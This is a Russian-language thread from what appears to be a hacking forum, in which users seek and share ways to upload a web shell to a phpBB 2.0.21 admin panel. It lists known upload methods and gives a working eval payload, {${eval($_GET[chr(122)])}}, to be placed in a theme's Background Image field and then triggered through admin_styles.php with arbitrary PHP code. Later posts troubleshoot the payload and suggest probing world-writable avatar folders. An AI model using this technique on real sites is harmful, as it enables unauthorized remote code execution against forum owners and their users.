RDot

RDot (https://rdot.org/forum/index.php)
-   Форумы (https://rdot.org/forum/forumdisplay.php?f=34)
-   -   Шелл в phpBB 2.0.21 с патченным PHP (https://rdot.org/forum/showthread.php?t=3090)

Белый Тигр 10.04.2014 11:29

Шелл в phpBB 2.0.21 с патченным PHP
 
Есть админка с phpBB 2.0.21, требуется залить шелл. Нашёл в сети список из 7 способов это сделать:
  • Через highlight багу (пропатчено)
  • Через стили (пропатчено)
  • Через язык интерфейса (пропатчено)
  • Бага в профиле с нулевым байтом в user_sig_bb_code_uid (пропатчено)
  • Через изменение пути аватара (пропатчено в PHP - с copy() нульбайт не срабатывает)
  • Создание файла через mysql с помощью восстановления БД (INTO OUTFILE - нет прав на запись в веб-директорию)
  • Через user_sig_bbcode_uid с помощью восстановления БД (пропатчено в PHP - не обрабатываются регулярки с null-байт + Warning)
У пользователя MySQL есть права на чтение/запись файлов, но скрипты работают от имени отдельного пользователя и в его директорию MySQL`ю путь закрыт.
Существуют ли ещё какие-нибудь способы влить туда шелл?

Лаврушкин 12.04.2014 12:21

Если стили взять например. там theme_info.cfg хотябы правится?(по стандартным путям) права на запись есть? Edit Theme работает?

Белый Тигр 13.04.2014 19:52

Спасибо! Видел способ с theme_info.cgf, но там было описано создание этого файла в /tmp, добавление новых стилей и прочее. Отмёл его сразу т.к. 21 уже в коде проверят имена тем. А оказывается я был совсем рядом :)
Идём в редактирование текущего стиля, в фоновую картинку (можно в другой параметр, но этот никак не отражается на теме из моего случая) вписываем "{${eval($_GET[chr(122)])}}", производим её экспорт и можно обращаться к ссылке добавления нового стиля передавая в параметре z нужный php-код.

madhatter 13.04.2014 20:39

Выполнение кода в стилях, как уже сказали, не бага, а фича phpbb. Некоторые без нее просто не работают, но не забудьте включить эту опцию. Если у вас file_priv на запись от мускула, у вас, вероятно, root\dba. Возможен вариант с соседями. Также стоит проверять диру для загрузки аватар, на нее по доброй традиции часто ставят 777.

beau 22.05.2014 21:38

Цитата:

Сообщение от Белый Тигр (Сообщение 35405)
Спасибо! Видел способ с theme_info.cgf, но там было описано создание этого файла в /tmp, добавление новых стилей и прочее. Отмёл его сразу т.к. 21 уже в коде проверят имена тем. А оказывается я был совсем рядом :)
Идём в редактирование текущего стиля, в фоновую картинку (можно в другой параметр, но этот никак не отражается на теме из моего случая) вписываем "{${eval($_GET[chr(122)])}}", производим её экспорт и можно обращаться к ссылке добавления нового стиля передавая в параметре z нужный php-код.

Вписал код, сделал экспорт, при переходе по ссылке admin_styles.php?mode=addnew&z=phpinfo(); ничего не происходит( пропатчено?

Помогите залиться ребята) Ситуация схожая:
Бага в профиле с нулевым байтом в user_sig_bb_code_uid (пропатчено)
Через изменение пути аватара (пропатчено в PHP - с copy() нульбайт не срабатывает)
Создание файла через mysql с помощью восстановления БД (INTO OUTFILE - нет прав на запись в веб-директорию)
Через user_sig_bbcode_uid с помощью восстановления БД (пропатчено в PHP - не обрабатываются регулярки с null-байт + Warning)

единственное не понял что за способы:
Через стили
Через язык интерфейса

Белый Тигр 22.05.2014 23:09

В какое поле вписывали и что там сейчас при редактировании?

beau 23.05.2014 00:40

В поле Background Image: вписал {${eval($_GET[chr(122)])}}, потом сделал экспорт, получил ответ что всё прошло успешно, сейчас там отображается
Цитата:

{${eval($_GET[chr(122)])}}

Белый Тигр 23.05.2014 07:21

Стиль активен в данный момент?
Если нет, то сделайте тоже самое с активным стилем.
Код сработает только когда форум подгрузит его конфиг, а конфиг он подгружает только у активного стиля.
По-моему проблема в этом.

beau 23.05.2014 17:39

Стиль всего один и он выбран в конфигурации.

Белый Тигр 23.05.2014 17:42

Проверьте внесены ли ваши изменения в конфиг темы:
/templates/[THEME_NAME]/theme_info.cfg
Может просто экспорт как-то криво прошёл


Часовой пояс GMT +3, время: 12:31.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot